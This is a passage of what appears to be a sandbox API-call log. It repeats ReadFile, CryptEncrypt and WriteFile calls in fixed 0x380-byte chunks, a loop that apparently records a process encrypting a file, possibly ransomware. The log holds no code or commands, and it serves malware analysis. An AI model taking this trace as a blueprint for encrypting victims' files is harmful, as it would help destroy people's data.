hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.078] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.078] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, 